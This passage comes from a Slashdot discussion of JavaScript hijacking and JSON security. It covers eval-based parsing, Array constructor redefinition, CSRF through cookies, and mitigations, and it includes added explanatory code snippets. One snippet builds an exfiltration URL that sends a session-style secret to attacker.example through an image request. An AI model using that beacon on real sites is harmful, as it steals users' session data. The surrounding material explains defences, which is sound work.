- It doesn't require POST data in each request.

A vulnerable application can be fixed by changing any of these three aspects:

- Stop using cookies, and instead supply the credentials in the request's URL or POST data.
- Don't use JSON, or munge your JSON so that it can't be run directly from within a <script> tag; for example, you could put comments around it in the server and strip them off in your client.
- Have the client send some POST data and check for it on the server (a <script> tag can't send POST data).

My preference, and the strategy that I've used in Anyterm and Decimail Webmail, is to not use cookies. To me it actually seems easier to put the session ID in the request, rather than to mess around with cookies.

The advisory, which explains it all but is a bit waffly at the start, is at http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf [fortifysoftware.com]
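The "munge your JSON" mitigation from the list above can be sketched as follows. Function names are illustrative, and `JSON.parse` (standardized later, in ES5) stands in for whatever parser the client uses; the idea is that the wrapped body is pure comment, so a `<script>` tag that includes it executes nothing:

```javascript
// Server side: wrap the JSON body in a comment before sending it.
function wrapForTransport(json) {
  return "/*" + json + "*/";
}

// Client side: the legitimate XMLHttpRequest caller strips the wrapper
// before parsing. A <script> tag cannot do this, so it sees only a comment.
function unwrapResponse(text) {
  return text.replace(/^\/\*/, "").replace(/\*\/$/, "");
}

const wire = wrapForTransport('{"user":"alice","role":"admin"}');
const data = JSON.parse(unwrapResponse(wire));
```

The POST-only variant works for the same reason from the other direction: a `<script>` tag can only issue GETs, so requiring POST data keeps the endpoint out of its reach entirely.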

On the upside... (1)

athloi (1075845) | about 7 years ago | (#18575417)

MySpace 2.0 is then, by extension, doomed. Watch CNN for exciting stories of the kiddie Internet wild west, where sexual predators and teenage hackers battle over rocky terrain useless to anyone with anything of import on their minds.

i told that EVERY time AJAX - 2.0 hype was posted (3, Interesting)

unity100 (970058) | about 7 years ago | (#18575467)

If you delegate operations and processes to the client side, sooner or later attackers will find ways to exploit it, to the point where offering such client-side features becomes a security risk in itself. That will agitate the anti-virus, anti-spyware, and privacy product makers, and in the end drive visitors away from your site through blocks, warnings, and fear.

XML is so last week. What's really wrong. (5, Informative)

Animats (122034) | about 7 years ago | (#18575577)

XML is now so last week. Really l33t web apps use JSON, which is yet another way to write S-expressions like those of LISP, but now in Javascript brackets.

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org] . Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole. Second, there's an attack similar to the ones involving redefining XMLHttpRequest: redefining the Array constructor. [getahead.org] (Caution, page contains proof of concept exploit.)

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable. It's not clear how to allow "mashups" and prevent this. The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.
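The eval-based "parsing" criticized above can be contrasted with a real parser in a few lines. The payload here is invented; `JSON.parse` post-dates this discussion (it was standardized in ES5) but shows what a strict parser buys you:

```javascript
// A payload that is executable JavaScript but NOT valid JSON.
const payload = '{"a": (function () { globalThis.pwned = true; return 1; })()}';

// How some 2007-era JSON libraries "parsed": feed the text to eval,
// which runs whatever code the text happens to contain.
function parseWithEval(text) {
  return eval("(" + text + ")");
}

const viaEval = parseWithEval(payload); // side effect: sets globalThis.pwned

// A real JSON parser rejects the same payload outright.
let rejected = false;
try {
  JSON.parse(payload);
} catch (e) {
  rejected = true; // SyntaxError: not valid JSON
}
```

Filtering the text before the eval, as the popular implementations did, is exactly the approach that "missed filtering something and left a hole"; a grammar-level parser has no such hole to miss.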

half troll, half tart (1)

rodentia (102779) | about 7 years ago | (#18576173)

I'll ignore the debunked *XML is S-expressions* bait for the chance to second your critique of JavaScript and the inherent problems with the AJ part of AJAX.

Re:XML is so last week. What's really wrong. (3, Interesting)

julesh (229690) | about 7 years ago | (#18576797)

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security-risk"; document.body.appendChild(e);', which I've seen many scripts do), how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

The fix seems obvious to me:

* cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

* XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

Scripts, yes. I don't see the need to ensure that data originates in the same domain.

Old truths new truths... (1)

CodeShark (17400) | about 7 years ago | (#18575679)

AKA, the security programmer's favorite adage: "The user is the enemy."


That is, when ANY new technique or code module is to be used in a production environment, it should not be considered ready until it has been thoroughly attacked by a person who has the kind of mind-set that will expose code vulnerabilities before a user (or set of users) finds them.

Trouble is, most IT organizations have a hard sell getting that type of person into the company: first, because an "inside the firewall" attacker is counter-intuitive to the idea that a company should trust its employees, and second, because the position seems redundant IF the programmers are up to speed on writing secure applications. Which (catch-22 here) they won't know until it's too late. Finally, inside-the-wire attackers are much more dangerous than outside attackers, because the inside-the-wire person comes to know exactly what is vulnerable, and what can be done with that knowledge.

Any thoughts?

Executing 3rd party code by default is insecure? (1)

freezin fat guy (713417) | about 7 years ago | (#18575723)

Fortunately the web development community has learned so much from the ongoing ramifications of Microsoft's "features first, security later" approach in the 90's that we would never recreate such a mess. Oh wait - automatic, default execution of third party code on the client browser, INSIDE THE FIREWALL? What could possibly go wrong with that?

The arguments today also mirror what went on with Windows and Outlook in the 90's. A few wild haired prophets screaming doom and gloom but 99.9% of the IT community was/is hypnotized by the glamour of "features, features, features" and security is relegated to patching. Like building a submarine out of swiss cheese. You'll spend the rest of your life patching but if everyone does it, it's normal. A few weirdos will look up and say "why don't we just start with a less porous base material?" but they will be shouted down by the masses.

Javascript, Flash and Applets are insecure by concept. Oh, pardon me, sandboxes will take care of everything? Append an image to the DOM with its src pointing at your server. If that "image" is actually a program which reads the query string, you can pass it any information you want. Sandbox jumped. Not a bug, a feature.
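The image trick above takes only a couple of lines; the attacker hostname here is invented. The data rides out in the URL of an ordinary GET request, which no sandbox blocks:

```javascript
// Build an exfiltration URL: the "image" request smuggles the secret
// out in its query string.
function buildExfilUrl(secret) {
  return "http://attacker.example/log?d=" + encodeURIComponent(secret);
}

const url = buildExfilUrl("session=abc; theme=dark");

// In a browser, the script would then simply do:
//   var img = document.createElement("img");
//   img.src = url;
//   document.body.appendChild(img);
// and the browser dutifully issues the GET to attacker.example.
```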

It's not enough to patch websites. It only takes one popular compromised site to infect thousands or even millions of users. Do I trust every site on the internet to be 100% invulnerable 24/7? Not really. Not even the sites I work on.

Most BANKS and financial services require Javascript to log in. Nice to know such critical web services are designed by people who "care about customer security." (cough, cough)

NoScript [noscript.net] seems to be a reasonable compromise. No browser I'm aware of takes this approach by default.

Re:Executing 3rd party code by default is insecure (0)

Anonymous Coward | about 7 years ago | (#18576393)

Certain aspects of JavaScript, Flash, and Applets when misused can lead to insecure web applications


There, I fixed that for you. But feel free to continue to make sweeping generalizations - that way my contention that 95% of all developers are idiots will continue to be correct.

Re:Executing 3rd party code by default is insecure (2, Funny)

nuzak (959558) | about 7 years ago | (#18576809)

> Like building a submarine out of swiss cheese.

I suspect a submarine built out of a nice solid gruyere would probably not be terribly seaworthy either. When it comes to the structural integrity of hull materials, cheese tends to rank pretty low.

I'm still waiting! (1)

StarfishOne (756076) | about 7 years ago | (#18575879)

I'm still waiting for someone to come up with a nice pun involving the title of this news item and Steven Seagal! :D

I'm out for justice ;D